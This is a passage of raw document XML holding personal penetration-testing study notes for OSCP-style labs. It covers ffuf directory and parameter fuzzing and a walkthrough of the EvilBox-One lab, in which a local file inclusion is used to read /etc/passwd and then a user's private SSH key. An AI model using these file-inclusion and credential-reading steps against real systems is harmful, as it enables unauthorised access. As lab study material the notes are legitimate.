        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there's a website on port 8080, you will have to specify the port in the URL, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="297"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.10.10:8080/FUZZ</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t5ss2gd4v9n5" w:id="143"/>
      <w:bookmarkEnd w:id="143"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic URL Fuzzing (finding URL paths):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt -ic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I like this wordlist better than the dirbuster wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I heard it's really good for OSCP. For example, it found the vulnerable directory in Relia Challenge Lab .246 that the dirbuster one couldn't find</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000114F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -ic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001150">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirb/big.txt -ic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are dealing with a virtual host, put the domain instead of the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to speed it up, add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 100</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default is 40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ignores the wordlist comments which are useless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, the keyword "FUZZ" is a placeholder and it's where all the words from the wordlist go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECURSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--recursion -recursion-depth 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> anywhere in the command, and replace "2" with any number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .php,.js,.json,.html,.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to specify file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to add the "." before the file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001158">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001159">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For adding/overwrite HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H "X-Forwarded-For: 10.10.10.10"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is specifically for the X-Forwarded-For header, but you can replace it with any header. Just use the -H flag</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will append the header, unless the header already exists, in that case it will overwrite the original header instead of appending</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000115E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if you need to add/overwrite multiple headers, then just use the flag multiple times (idk if that works though)</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mqgnwmru2lcd" w:id="144"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001162">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever have a blank page, then try parameter fuzzing like in </w:t>
      </w:r>
      <w:hyperlink r:id="rId347">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we have a blank page like evil.php, and then we do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/secret/evil.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?FUZZ=/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fs 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001165">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there is any parameter that allows for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then this fuzz will find it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001166">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fs 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to filter out any output that has size 0, which would be a blank site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001167">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/secret/evil.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?FUZZ=id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fs 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001168">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one I haven't seen used, but it could work to find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we get LFI, then we can see which users are in /etc/passwd. Look for entries in /home, like /home/michael. If you find those users, then you can try and look for their private SSH key, which is that they did in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId348">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One PG Play</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On firefox, go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.21/secret/evil.php?command=/home/mowree/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The user we found from /etc/passwd was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mowree</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get the formatted correct text check the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view-source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste the private key into a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
